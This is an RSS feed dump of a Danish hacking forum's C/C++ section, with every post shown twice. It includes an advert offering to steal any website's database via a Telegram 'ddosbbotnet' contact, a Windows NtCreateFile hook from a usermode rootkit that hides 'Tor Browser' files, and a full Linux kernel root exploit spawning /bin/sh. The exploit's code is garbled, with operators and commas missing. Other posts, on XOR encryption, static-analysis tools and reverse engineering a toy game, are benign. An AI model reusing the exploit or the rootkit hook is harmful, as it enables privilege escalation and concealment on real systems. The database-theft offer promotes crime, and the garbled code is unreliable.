<![CDATA[Shellsec - C++/C]]> https://www.shellsec.pw/ Tue, 05 May 2026 10:29:02 +0000 MyBB <![CDATA[⛔️ We can pull the DB of any website you want. Send the site and we will pull it.. ⛔️]]> https://www.shellsec.pw/traad-%E2%9B%94%EF%B8%8F-we-can-pull-the-db-of-any-website Mon, 02 Feb 2026 02:40:19 +0100 https://www.shellsec.pw/traad-%E2%9B%94%EF%B8%8F-we-can-pull-the-db-of-any-website
Owner : https://t.me/ddosbbotnet

Owner : https://t.me/ddosbbotnet

Owner : https://t.me/ddosbbotnet]]>
Owner : https://t.me/ddosbbotnet

Owner : https://t.me/ddosbbotnet

Owner : https://t.me/ddosbbotnet]]> <![CDATA[NtCreateFileNext Hook i C++]]> https://www.shellsec.pw/traad-ntcreatefilenext-hook-i-c Fri, 05 May 2017 22:30:20 +0200 https://www.shellsec.pw/traad-ntcreatefilenext-hook-i-c Vi tager brug af windows API'en til at gøre filen fuldstændigt skjult om så du prøver at vise skjulte filer, dette er noget kode jeg har skrevet til mit usermode rootkit.

Nyd det Smile

#define STATUS_SUCCESS 0x00000000

#define STATUS_ERROR   0xFFFFFFFF

#define FILE_DOES_NOT_EXIST    0x00000005

_NtCreateFileNext NtCreateFileNext = 0;

NTSTATUS NtCreateFileHooked( _Out_   PHANDLE FileHandle , 

_In_     ACCESS_MASK        DesiredAccess ,

_In_     POBJECT_ATTRIBUTES ObjectAttributes ,

_Out_    PIO_STATUS_BLOCK   IoStatusBlock ,

_In_opt_ PLARGE_INTEGER     AllocationSize ,

_In_     ULONG              FileAttributes ,

_In_     ULONG              ShareAccess ,

_In_     ULONG              CreateDisposition ,

_In_     ULONG              CreateOptions ,

_In_     PVOID              EaBuffer ,

_In_     ULONG              EaLength )

{

NTSTATUS status = NtCreateFileNext ( FileHandle , DesiredAccess , ObjectAttributes , IoStatusBlock ,

AllocationSize , FileAttributes , ShareAccess , CreateDisposition ,

CreateOptions  , EaBuffer , EaLength );

if ( status == STATUS_SUCCESS )

{

wchar_t * path = new wchar_t [ ObjectAttributes->ObjectName->Length + 1 ];

wmemcpy ( path , ObjectAttributes->ObjectName->Buffer , ObjectAttributes->ObjectName->Length );

if ( StrStrW( path , L"Tor Browser" ) )

{

std::wcout << L"-> " << path << std::endl;

IoStatusBlock->Information = FILE_DOES_NOT_EXIST;

IoStatusBlock->Status = STATUS_ERROR;

IoStatusBlock->Pointer = NULL;

return STATUS_ERROR;

}

}



return status;

}
]]> Vi tager brug af windows API'en til at gøre filen fuldstændigt skjult om så du prøver at vise skjulte filer, dette er noget kode jeg har skrevet til mit usermode rootkit.

Nyd det Smile

#define STATUS_SUCCESS 0x00000000

#define STATUS_ERROR   0xFFFFFFFF

#define FILE_DOES_NOT_EXIST    0x00000005

_NtCreateFileNext NtCreateFileNext = 0;

NTSTATUS NtCreateFileHooked( _Out_   PHANDLE FileHandle , 

_In_     ACCESS_MASK        DesiredAccess ,

_In_     POBJECT_ATTRIBUTES ObjectAttributes ,

_Out_    PIO_STATUS_BLOCK   IoStatusBlock ,

_In_opt_ PLARGE_INTEGER     AllocationSize ,

_In_     ULONG              FileAttributes ,

_In_     ULONG              ShareAccess ,

_In_     ULONG              CreateDisposition ,

_In_     ULONG              CreateOptions ,

_In_     PVOID              EaBuffer ,

_In_     ULONG              EaLength )

{

NTSTATUS status = NtCreateFileNext ( FileHandle , DesiredAccess , ObjectAttributes , IoStatusBlock ,

AllocationSize , FileAttributes , ShareAccess , CreateDisposition ,

CreateOptions  , EaBuffer , EaLength );

if ( status == STATUS_SUCCESS )

{

wchar_t * path = new wchar_t [ ObjectAttributes->ObjectName->Length + 1 ];

wmemcpy ( path , ObjectAttributes->ObjectName->Buffer , ObjectAttributes->ObjectName->Length );

if ( StrStrW( path , L"Tor Browser" ) )

{

std::wcout << L"-> " << path << std::endl;

IoStatusBlock->Information = FILE_DOES_NOT_EXIST;

IoStatusBlock->Status = STATUS_ERROR;

IoStatusBlock->Pointer = NULL;

return STATUS_ERROR;

}

}



return status;

}
]]> <![CDATA[Hack]]> https://www.shellsec.pw/traad-hack--4829 Sun, 19 Feb 2017 19:45:56 +0100 https://www.shellsec.pw/traad-hack--4829 Jeg leder efter et godt sted at lære at hacke fra C#
Jeg håber i kan hjælpe mig.]]> Jeg leder efter et godt sted at lære at hacke fra C#
Jeg håber i kan hjælpe mig.]]> <![CDATA[x]]> https://www.shellsec.pw/traad-x Tue, 30 Aug 2016 14:10:20 +0200 https://www.shellsec.pw/traad-x <![CDATA[Escalation root exploit i C påvirker x86_64 linux kernels.]]> https://www.shellsec.pw/traad-escalation-root-exploit-i-c-paavirker Sun, 01 Nov 2015 20:37:16 +0100 https://www.shellsec.pw/traad-escalation-root-exploit-i-c-paavirker
PHP kode:
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <inttypes.h>
#include <sys/reg.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <string.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int kernelmodecode(void *filevoid *submissive)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

unsigned long
get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    int ret 0oldstyle 0;
                               // oldstyle = 0;
    fopen("/proc/kallsyms""r");
    if (== NULL) {
        fopen("/proc/ksyms""r");
        if (== NULL)
            return 0;
        oldstyle 1;
    }

    while (ret != EOF) {
        if (!oldstyle) {
            ret fscanf(f"%p %c %s\n", (void **) &addr, &dummysname);
        } else {
            ret fscanf(f"%p %s\n", (void **) &addrsname);
            if (ret == 2) {
                char *p;
                if (strstr(sname"_O/") || strstr(sname"_S.")) {
                    continue;
                }
                strrchr(sname'_');
                if (> ((char *) sname 5) && !strncmp(3"smp"3)) {
                    4;
                    while (> (char *)sname && *(1) == '_') {
                        p--;
                    }
                    *'\0'
                }
            }
        }
        if (ret == 0) {
            fscanf(f"%s\n"sname);
            continue;
        }
        if (!strcmp(namesname)) {
            printf("resolved symbol %s to %p\n"name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);

    return 0;
}

 
static void docall(uint64_t *ptruint64_t size)
{
    commit_creds = (_commit_credsget_symbol("commit_creds");
    if (!commit_creds) {
        printf("symbol table not available, aborting!\n");
        exit(1);
    }

    prepare_kernel_cred = (_prepare_kernel_credget_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
        printf("symbol table not available, aborting!\n");
        exit(1);
    }

        uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);

    printf("mapping at %lx\n"tmp); 

        if (mmap((void*)tmpsizePROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -10) == MAP_FAILED) {
                printf("mmap fault\n");
                exit(1);
        }
 
        for (; (uint64_tptr < (tmp size); ptr++)
                *ptr = (uint64_t)kernelmodecode;
 
        __asm__("\n"
        "\tmovq $0x101, %esc\n"
        "\tint $0x80\n");
 
        printf("UID %d, EUID:%d GID:%d, EGID:%d\n"getuid(), geteuid(), getgid(), getegid());
        execl("/bin/sh""bin/sh"NULL);
        printf("no /bin/sh ??\n");
        exit(0);
}
 
int main(int argcchar **argv)
{
        int pidstatusset 0;
        uint64_t esc;
        uint64_t kern_s 0xffffffff80000000;
        uint64_t kern_e 0xffffffff84000000;
        uint64_t off 0x0000000800000101 8;
 
        if (argc == 4) {
                docall((uint64_t*)(kern_s off), kern_e kern_s);
                exit(0);
        }
 
        if ((pid fork()) == 0) {
                ptrace(PTRACE_TRACEME000);
                execl(argv[0], argv[0], "2""3""4"NULL);
                perror("exec fault");
                exit(1);
        }
 
        if (pid == -1) {
                printf("fork fault\n");
                exit(1);
        }
 
        for (;;) {
                if (wait(&status) != pid)
                        continue;
 
                if (WIFEXITED(status)) {
                        printf("Process finished\n");
                        break;
                }
 
                if (!WIFSTOPPED(status))
                        continue;
 
                if (WSTOPSIG(status) != SIGTRAP) {
                        printf("Process received signal: %d\n"WSTOPSIG(status));
                        break;
                }
 
                esc ptrace(PTRACE_PEEKUSERpid8*ORIG_RAX0);
                if (esc == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSERpid8*ORIG_RAXoff/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set 1;
                    //esc = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                }
 
                if ((esc == 11) && set) {
                        ptrace(PTRACE_DETACHpid00);
                        for(;;)
                                sleep(10000);
                }
 
                if (ptrace(PTRACE_SYSCALLpid10) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
        }
 
        return 0;

]]>
PHP kode:
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <inttypes.h>
#include <sys/reg.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <string.h>

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;

int kernelmodecode(void *filevoid *submissive)
{
    commit_creds(prepare_kernel_cred(0));
    return -1;
}

unsigned long
get_symbol(char *name)
{
    FILE *f;
    unsigned long addr;
    char dummy;
    char sname[512];
    int ret 0oldstyle 0;
                               // oldstyle = 0;
    fopen("/proc/kallsyms""r");
    if (== NULL) {
        fopen("/proc/ksyms""r");
        if (== NULL)
            return 0;
        oldstyle 1;
    }

    while (ret != EOF) {
        if (!oldstyle) {
            ret fscanf(f"%p %c %s\n", (void **) &addr, &dummysname);
        } else {
            ret fscanf(f"%p %s\n", (void **) &addrsname);
            if (ret == 2) {
                char *p;
                if (strstr(sname"_O/") || strstr(sname"_S.")) {
                    continue;
                }
                strrchr(sname'_');
                if (> ((char *) sname 5) && !strncmp(3"smp"3)) {
                    4;
                    while (> (char *)sname && *(1) == '_') {
                        p--;
                    }
                    *'\0'
                }
            }
        }
        if (ret == 0) {
            fscanf(f"%s\n"sname);
            continue;
        }
        if (!strcmp(namesname)) {
            printf("resolved symbol %s to %p\n"name, (void *) addr);
            fclose(f);
            return addr;
        }
    }
    fclose(f);

    return 0;
}

 
static void docall(uint64_t *ptruint64_t size)
{
    commit_creds = (_commit_credsget_symbol("commit_creds");
    if (!commit_creds) {
        printf("symbol table not available, aborting!\n");
        exit(1);
    }

    prepare_kernel_cred = (_prepare_kernel_credget_symbol("prepare_kernel_cred");
    if (!prepare_kernel_cred) {
        printf("symbol table not available, aborting!\n");
        exit(1);
    }

        uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);

    printf("mapping at %lx\n"tmp); 

        if (mmap((void*)tmpsizePROT_READ|PROT_WRITE|PROT_EXEC,
                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -10) == MAP_FAILED) {
                printf("mmap fault\n");
                exit(1);
        }
 
        for (; (uint64_tptr < (tmp size); ptr++)
                *ptr = (uint64_t)kernelmodecode;
 
        __asm__("\n"
        "\tmovq $0x101, %esc\n"
        "\tint $0x80\n");
 
        printf("UID %d, EUID:%d GID:%d, EGID:%d\n"getuid(), geteuid(), getgid(), getegid());
        execl("/bin/sh""bin/sh"NULL);
        printf("no /bin/sh ??\n");
        exit(0);
}
 
int main(int argcchar **argv)
{
        int pidstatusset 0;
        uint64_t esc;
        uint64_t kern_s 0xffffffff80000000;
        uint64_t kern_e 0xffffffff84000000;
        uint64_t off 0x0000000800000101 8;
 
        if (argc == 4) {
                docall((uint64_t*)(kern_s off), kern_e kern_s);
                exit(0);
        }
 
        if ((pid fork()) == 0) {
                ptrace(PTRACE_TRACEME000);
                execl(argv[0], argv[0], "2""3""4"NULL);
                perror("exec fault");
                exit(1);
        }
 
        if (pid == -1) {
                printf("fork fault\n");
                exit(1);
        }
 
        for (;;) {
                if (wait(&status) != pid)
                        continue;
 
                if (WIFEXITED(status)) {
                        printf("Process finished\n");
                        break;
                }
 
                if (!WIFSTOPPED(status))
                        continue;
 
                if (WSTOPSIG(status) != SIGTRAP) {
                        printf("Process received signal: %d\n"WSTOPSIG(status));
                        break;
                }
 
                esc ptrace(PTRACE_PEEKUSERpid8*ORIG_RAX0);
                if (esc == 0x000000000101) {
                        if (ptrace(PTRACE_POKEUSERpid8*ORIG_RAXoff/8) == -1) {
                                printf("PTRACE_POKEUSER fault\n");
                                exit(1);
                        }
                        set 1;
                    //esc = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);
                }
 
                if ((esc == 11) && set) {
                        ptrace(PTRACE_DETACHpid00);
                        for(;;)
                                sleep(10000);
                }
 
                if (ptrace(PTRACE_SYSCALLpid10) == -1) {
                        printf("PTRACE_SYSCALL fault\n");
                        exit(1);
                }
        }
 
        return 0;

]]> <![CDATA[Automatiseret code auditing - Råd søges]]> https://www.shellsec.pw/traad-automatiseret-code-auditing-raad-soeges Fri, 13 Feb 2015 05:47:31 +0100 https://www.shellsec.pw/traad-automatiseret-code-auditing-raad-soeges De finder selvfølgelig ikke alt, men er gode til at finde småting som underruns, overruns, off-by-one, format string bugs etc.

Er der nogen af jer, der kender nogle tools, designet til C eller C++?
I behover ikke nødvendigvis have erfaring med dem. Jeg skal nok selv læse op på dem. :)

Jeg er sådan set også interesseret i sådanne tools til andre sprog, men primært C/C++, og derfor er tråden lavet i denne sektion.

Inspiration: wikipedia - List of tools for static code analysis]]> De finder selvfølgelig ikke alt, men er gode til at finde småting som underruns, overruns, off-by-one, format string bugs etc.

Er der nogen af jer, der kender nogle tools, designet til C eller C++?
I behover ikke nødvendigvis have erfaring med dem. Jeg skal nok selv læse op på dem. :)

Jeg er sådan set også interesseret i sådanne tools til andre sprog, men primært C/C++, og derfor er tråden lavet i denne sektion.

Inspiration: wikipedia - List of tools for static code analysis]]> <![CDATA[C/C++ lille introduktion til Xor kryptering]]> https://www.shellsec.pw/traad-c-c-lille-introduktion-til-xor-kryptering Wed, 23 Jul 2014 14:43:06 +0200 https://www.shellsec.pw/traad-c-c-lille-introduktion-til-xor-kryptering
Introduktion til Xor
[Billede: physics-meme.png]

Allerførst, jeg vil forsøge at skære det meste ud i pap, så selv lycia-slænget har en chance.

Hvad skal jeg bruge det til?
Enhver programmør vil på et eller andet tidspunkt kommer ud for, at skulle behandle sensitiv data. Men udover at kryptere data for at beskytte mod sniffing data leaks .o.l., kan kryptering anvendes til mange andre formål. Lad os forestille os, at vi har lavet et server-klient login-system. Systemet skal være sikkert, så man får et nyt kodeord, hvergang man logger ind (ligesom nemid). Systemet ser således ud:
  1. Serveren sender chipertekst (krypterede string) til klienten
  2. Klienten dekryptere til den oprindelig string
  3. Klienten returnerer den oprindelige string til serveren
  4. Serveren afslutter med at checke, om den returnerede string er tilsvarende den oprindelige.
Overstående er muligvis et dårligt eksempel, men you get the point...
En anden mulighed til et lign. system, kunne laves ved at benytte assymetriske krypteringsalgoritmer. Assymetriske chipers bruger en key til at kryptere, og en anden til at dekryptere. Jeg vil dog komme ind på en lidt simplere krypteringsalgoritme, også kaldet chiper, kaldet Xor. Fordelen ved Xor er, at det er meget nemt at forstå, og ikke kræver meget forhåndsviden, før man kan gå i gang.

Hvad er kryptering?
Kryptering har til formål at omdanne data til en 'ulæsbar' version, der umuliggør, at den oprindelige data kan læses uden brug af den modsatte process, der indebærer at man har den originale nøgle.

En krypteringsalgoritme eller cipher, skal egentlig bare betragtes som en hvilken som helst anden algoritme. Altså, en slags opskrift på, hvordan noget skal håndteres. Lad os kigge på RSA algoritmen:

p = 3 and q = 11 // Vælg to primtal
n = p * q = 3 * 11 = 33 // Beregn
φ(n) = (p - 1) * (q - 1) = 2 * 10 = 20 // Beregn
e = 7 // e skal være 1<e< φ(n) og e samt n er indbyrdes primisk
// Bestem end værdi hvor (d * e) % φ(n) = 1.
// F.eks. d = 3 [(3 * 7) % 20 = 1]
(e, n) => (7, 33) // Public key
(d, n) => (3, 33) // Private key
m = 2 is c = 27 % 33 = 29 // Encrypting
c = 29 is m = 293 % 33 = 2 // Decryption

Overstående eksempel var mest for at forklare en algoritme, og ikke et forsøg på, at lære jer hvordan RSA algoritmen fungerer. For at lave et par RSA keys, skal man altså bare følge 'opskriften'.

Hvordan virker Xor?
Som en start kan jeg afsløre, at chiperen ikke kun hedder Xor, fordi det lyder |337!1. Xor er et sammendrag af "exclusive or", og er en bitwise boolean operator i C++. Den kan altså returnere TRUE eller FALSE. Hvis den ene Xor gate er TRUE og den anden er FALSE, i vilkårlig rækkefølge, returneres altid TRUE. Hvis begge er TRUE eller False Returneres FALSE.

Kode:
|0||0|=|0| // FALSE
|1||0|=|1| // TRUE
|0||1|=|1| // TRUE
|1||1|=|0| // FALSE

Men hvordan kan vi bruge det til at kryptere noget? Lad os forestille os, at vi ville kryptere bogstavet 'P'. 'P's' ascii værdi er 80. Vi skriver 80 om til det binære talsystem (2-tals) , i stedet for det decimale (10 tals).

Kode:
P-->80-->1010000
chr  ascii  binært

Vi finder et bogstav, vi vil anvende som "nøgle".

Kode:
A-->65-->1000001
chr  ascii  binært

Tror egentlig ikke jeg behøver forklare det her...

Kode:
1010000 // P
1000001 // A Nøgle
-------- // Xor
0010001 // ASCII 17

For at dekryptere vores bogstav igen, gør vi det samme.
Kode:
0010001 // ASCII 17
1000001 // A Nøgle
-------- // Xor
1010000 // P
[/code]

TADA! Simpelt? Prøv selv!

Hvis vi ville have krypteret et ord eller end string, havde vi benyttet samme fremgangsmåde, bare med alle tegn.

Xor i C++
I C++ er Xor operatoren '^' tegnet. Lad os starte med, at kryptere og dekryptere en variabel af 'char' data typen.

#include <iostream>



int main()

{

    char cryptthis;

    char key;



    std::cout << "Char to encrypt: ";

    std::cin >> cryptthis;

    std::cout << "Key: ";

    std::cin >> key;



    cryptthis ^=key; // Xor operation. Præcis som vi gjorde det manuelt.

    std::cout << "The encrypted character is: " << cryptthis ;



    cryptthis ^=key; // Som nævnt dekryptere vi på samme måde.

    std::cout << "\nThe decrypted character is: " << cryptthis;



    return 1337;

}
Hvis vi skulle gøre dette ved en string, er alt vi behøver, som førnævnt at 'køre' det hele igennem. Lad os slutte af med, at lave et program med en Xor encrypt / decrypt function.

/*

Prepare for slamkode!

*/

#include <iostream>

#include <string>

using namespace std;



string XOREnc(string str, string key)

{

    string enc("");

for (unsigned int i=0; i < str.length(); i++) // Her checker vi hele stringen igennem ligesom vi gjorde manuelt. Læg mærke til, at vi en string som key.

        enc += str[i] ^ key[i % (sizeof(key) / sizeof(char))]; // Kan i se problemet? Hvis key<str. Lille øvelse til jer.

    return enc;

}



int main() 

{

    string str, encrypted, decrypted, key;

    cin >> str;

    cin >> key;

    encrypted = XOREnc(str, key);

    decrypted = XOREnc(encrypted, key); // Vi kan som sagt benytte samme function til dekryptering.

    cout << "Encrypted string: " << encrypted << endl;

    cout << "Decrypted string: " << decrypted;

    return 1337;

}
Så let kan kryptering være.
Blev skrevet i går kl. 3 :D. Kan godt være jeg kommer til at rette lidt i den...]]>
Introduktion til Xor
[Billede: physics-meme.png]

Allerførst, jeg vil forsøge at skære det meste ud i pap, så selv lycia-slænget har en chance.

Hvad skal jeg bruge det til?
Enhver programmør vil på et eller andet tidspunkt kommer ud for, at skulle behandle sensitiv data. Men udover at kryptere data for at beskytte mod sniffing data leaks .o.l., kan kryptering anvendes til mange andre formål. Lad os forestille os, at vi har lavet et server-klient login-system. Systemet skal være sikkert, så man får et nyt kodeord, hvergang man logger ind (ligesom nemid). Systemet ser således ud:
  1. Serveren sender chipertekst (krypterede string) til klienten
  2. Klienten dekryptere til den oprindelig string
  3. Klienten returnerer den oprindelige string til serveren
  4. Serveren afslutter med at checke, om den returnerede string er tilsvarende den oprindelige.
Overstående er muligvis et dårligt eksempel, men you get the point...
En anden mulighed til et lign. system, kunne laves ved at benytte assymetriske krypteringsalgoritmer. Assymetriske chipers bruger en key til at kryptere, og en anden til at dekryptere. Jeg vil dog komme ind på en lidt simplere krypteringsalgoritme, også kaldet chiper, kaldet Xor. Fordelen ved Xor er, at det er meget nemt at forstå, og ikke kræver meget forhåndsviden, før man kan gå i gang.

Hvad er kryptering?
Kryptering har til formål at omdanne data til en 'ulæsbar' version, der umuliggør, at den oprindelige data kan læses uden brug af den modsatte process, der indebærer at man har den originale nøgle.

En krypteringsalgoritme eller cipher, skal egentlig bare betragtes som en hvilken som helst anden algoritme. Altså, en slags opskrift på, hvordan noget skal håndteres. Lad os kigge på RSA algoritmen:

p = 3 and q = 11 // Vælg to primtal
n = p * q = 3 * 11 = 33 // Beregn
φ(n) = (p - 1) * (q - 1) = 2 * 10 = 20 // Beregn
e = 7 // e skal være 1<e< φ(n) og e samt n er indbyrdes primisk
// Bestem end værdi hvor (d * e) % φ(n) = 1.
// F.eks. d = 3 [(3 * 7) % 20 = 1]
(e, n) => (7, 33) // Public key
(d, n) => (3, 33) // Private key
m = 2 is c = 27 % 33 = 29 // Encrypting
c = 29 is m = 293 % 33 = 2 // Decryption

Overstående eksempel var mest for at forklare en algoritme, og ikke et forsøg på, at lære jer hvordan RSA algoritmen fungerer. For at lave et par RSA keys, skal man altså bare følge 'opskriften'.

Hvordan virker Xor?
Som en start kan jeg afsløre, at chiperen ikke kun hedder Xor, fordi det lyder |337!1. Xor er et sammendrag af "exclusive or", og er en bitwise boolean operator i C++. Den kan altså returnere TRUE eller FALSE. Hvis den ene Xor gate er TRUE og den anden er FALSE, i vilkårlig rækkefølge, returneres altid TRUE. Hvis begge er TRUE eller False Returneres FALSE.

Kode:
|0||0|=|0| // FALSE
|1||0|=|1| // TRUE
|0||1|=|1| // TRUE
|1||1|=|0| // FALSE

Men hvordan kan vi bruge det til at kryptere noget? Lad os forestille os, at vi ville kryptere bogstavet 'P'. 'P's' ascii værdi er 80. Vi skriver 80 om til det binære talsystem (2-tals) , i stedet for det decimale (10 tals).

Kode:
P-->80-->1010000
chr  ascii  binært

Vi finder et bogstav, vi vil anvende som "nøgle".

Kode:
A-->65-->1000001
chr  ascii  binært

Tror egentlig ikke jeg behøver forklare det her...

Kode:
1010000 // P
1000001 // A Nøgle
-------- // Xor
0010001 // ASCII 17

For at dekryptere vores bogstav igen, gør vi det samme.
Kode:
0010001 // ASCII 17
1000001 // A Nøgle
-------- // Xor
1010000 // P
[/code]

TADA! Simpelt? Prøv selv!

Hvis vi ville have krypteret et ord eller end string, havde vi benyttet samme fremgangsmåde, bare med alle tegn.

Xor i C++
I C++ er Xor operatoren '^' tegnet. Lad os starte med, at kryptere og dekryptere en variabel af 'char' data typen.

#include <iostream>



int main()

{

    char cryptthis;

    char key;



    std::cout << "Char to encrypt: ";

    std::cin >> cryptthis;

    std::cout << "Key: ";

    std::cin >> key;



    cryptthis ^=key; // Xor operation. Præcis som vi gjorde det manuelt.

    std::cout << "The encrypted character is: " << cryptthis ;



    cryptthis ^=key; // Som nævnt dekryptere vi på samme måde.

    std::cout << "\nThe decrypted character is: " << cryptthis;



    return 1337;

}
Hvis vi skulle gøre dette ved en string, er alt vi behøver, som førnævnt at 'køre' det hele igennem. Lad os slutte af med, at lave et program med en Xor encrypt / decrypt function.

/*

Prepare for slamkode!

*/

#include <iostream>

#include <string>

using namespace std;



string XOREnc(string str, string key)

{

    string enc("");

for (unsigned int i=0; i < str.length(); i++) // Her checker vi hele stringen igennem ligesom vi gjorde manuelt. Læg mærke til, at vi en string som key.

        enc += str[i] ^ key[i % (sizeof(key) / sizeof(char))]; // Kan i se problemet? Hvis key<str. Lille øvelse til jer.

    return enc;

}



int main() 

{

    string str, encrypted, decrypted, key;

    cin >> str;

    cin >> key;

    encrypted = XOREnc(str, key);

    decrypted = XOREnc(encrypted, key); // Vi kan som sagt benytte samme function til dekryptering.

    cout << "Encrypted string: " << encrypted << endl;

    cout << "Decrypted string: " << decrypted;

    return 1337;

}
Så let kan kryptering være.
Blev skrevet i går kl. 3 :D. Kan godt være jeg kommer til at rette lidt i den...]]> <![CDATA[[C++/ASM] GameHack 1/3 - Find funktionens adresse]]> https://www.shellsec.pw/traad-c-asm-gamehack-1-3-find-funktionens Tue, 17 Sep 2013 14:28:34 +0200 https://www.shellsec.pw/traad-c-asm-gamehack-1-3-find-funktionens Hvad går denne tutorial serie ud på?
Vi har et spil hvor der er runder. En runde er hvor mob angriber player, og player angriber mob. Vi er player. Det er tilfældigt hvem der vinder. Vi vil dog gerne vinde hver gang. Derfor injecter vi en selvskreven DLL ind i processen, hvor vi nu kan kalde funktionen attackMob() ubegrænset, og vinde hvergang.

Denne første del af GameHack serien, vil gå ud på at benytte reverse engineering til at opnå adressen på funktionen attackMob()
Den næste del vil gå ud på at injecte en DLL i GameHack.
Den sidste del vil være at skrive DLL'en så den kan benytte attackMob() funktionen så vi vinder hvergang

Det første er vores mobGame. Læs det, og forstå det. Hvis du ikke forstår det får du ikke noget ud af resten af denne tutorial
mobGame.cpp (Click to View)

Jeg har compilet en version som i kan downloade her: https://mega.co.nz/#!WNph1Rra!HNQwn1ibkX...E9yOJGS-c4
Jeg vil anbefale jer at benytte denne version hvis i er helt nye på området.
Hvis ikke kan i skrive lidt om i koden så der ændres lidt, så i selv skal tænke lidt mere.

Da vores mål er at kunne angribe, uden at blive angrebet, skal vi finde funktionen som angriber mob. Denne kan vi hurtigt finde ved et kig på koden:
	cout << "Attacking!" << endl;

			cout << "Round: " << roundNum << endl;

			roundNum++;	

			attackPlayer();

			attackMob();
funktionen som angriber mob er så attackMob()

Det vi nu skal gøre er at finde ud af hvor denne funktion ligger i memory når programmet køres. Her vil vi benytte IDA.
Vi starter IDA op og vælger at vi godt vil rode med vores egen fil(Go: Work on your own):
[Billede: 4tyiY.jpg]
Herefter trækker du blot filen mobGame.exe ind i IDA

Vi vil nu blive præsenteret for en anden skærm. Her trykker du blot "ok".
[Billede: 4tykX.png]

Vores .exe mobGame skulle nu gerne være loadet i IDA. Vælg graph view, da det efter min mening er det bedste(Højreklik midt i IDA og tryk graph view. Hvis muligheden ikke er der, er du allerede i graph view)
Det vi gør nu er at kigge på de forskellige ting og ser om vi kan finde noget som giver mening.
Vi kan hurtigt se vores if else statement hvor vi tjekker for hvilke valg der er truffet. Hvis der bliver trykket 1 så går vi til angreb, og hvis vi trykker 2 så flygter vi(programmet afsluttes)
[Billede: 4txvS.png]
Her kan vi tydeligt se hvad for et stykke kode den er igang med. Vi kan også se hvordan den sammenligner choice, med et nummer.
Først flyttes choice over i eax cpu registret.
mov	    eax, [esp+8+choice]
så sammenlignes eax med 1
cmp    eax, 1
Så kommet jnz. Jump if not zero
jnz	short loc_401340
Der bliver hoppet til loc_401340 hvis eax ikke er lig 1
Ellers fortsættes koden bare nedtil det spændende stykke. Nemlig inde i denne if statement:
if(choice==1)
og det er jo netop inde i denne if statement hvor de to funktioner attackMob og attackPlayer bliver kaldt.

Her ser vi et billed af funktionen i assembly:
[Billede: 4txD4.png]
Her ser vi et billed af funktionen i C++:
[Billede: 4txEx.png]

Her kan vi let se hvad det er der sker. Hvordan noget tekst i 2 omgange bliver push'et på stacken og herefter printet ved brug af cout.
Men længere nede ser vi 2 call's som går til attackPlayer og attackMob.
[Billede: 4txGT.png]
Dette er præcis hvad vi har ledt efter.
Vi kan nu se et call til attackMob. Vi klikker nu på attackMob for at se hvad der gemmer sig bag det call.
Meget hurtigt ved et lille kig kan vi se at det er den helt rigtige funktion vi har fat i. Vi klikker nu på den lille tilbage knap oppe i venstre hjørne af IDA for at komme tilbage til start.
Vi sætter nu et breakpoint ved attackMob ved at højreklikke på attackMob og klikke Add Breakpoint.
[Billede: 4txNf.png]
Det call til attackMob vil nu blive rødt.
[Billede: 4txO3.png]

Vi er nu klar til at køre vores program, så den kan stoppe ved breakpoint og fortælle den præcise lokation i memory.
I toppen af IDA, kan vi se en start button, samt pause og en stop
[Billede: 4txR0.png]
Her vælger vi Local Win32 debugger og trykker start
[Billede: 4txRk.png]

Et nyt vindue vil nu åbne, hvor vi kan se vores spil. Her vil vi trykke 1 for at angribe, så den rammer vores breakpoint ved attackMob

Her kan vi nu se at mob angriber player men så stopper/pauser programmet ved vores breakpoint
[Billede: 4txVa.png]
I IDA kan vi også se at den er stoppet ved det rigtige sted
[Billede: 4txXo.png]

Vi kan nu se den præcise lokation som er 003C1339 eller 0x003C1339
Vi har nu fundet funktionens præcise addresse. Denne vil blive brugt i den næste tutorial så følg med.]]> Hvad går denne tutorial serie ud på?
Vi har et spil hvor der er runder. En runde er hvor mob angriber player, og player angriber mob. Vi er player. Det er tilfældigt hvem der vinder. Vi vil dog gerne vinde hver gang. Derfor injecter vi en selvskreven DLL ind i processen, hvor vi nu kan kalde funktionen attackMob() ubegrænset, og vinde hvergang.

Denne første del af GameHack serien, vil gå ud på at benytte reverse engineering til at opnå adressen på funktionen attackMob()
Den næste del vil gå ud på at injecte en DLL i GameHack.
Den sidste del vil være at skrive DLL'en så den kan benytte attackMob() funktionen så vi vinder hvergang

Det første er vores mobGame. Læs det, og forstå det. Hvis du ikke forstår det får du ikke noget ud af resten af denne tutorial
mobGame.cpp (Click to View)

Jeg har compilet en version som i kan downloade her: https://mega.co.nz/#!WNph1Rra!HNQwn1ibkX...E9yOJGS-c4
Jeg vil anbefale jer at benytte denne version hvis i er helt nye på området.
Hvis ikke kan i skrive lidt om i koden så der ændres lidt, så i selv skal tænke lidt mere.

Da vores mål er at kunne angribe, uden at blive angrebet, skal vi finde funktionen som angriber mob. Denne kan vi hurtigt finde ved et kig på koden:
	cout << "Attacking!" << endl;

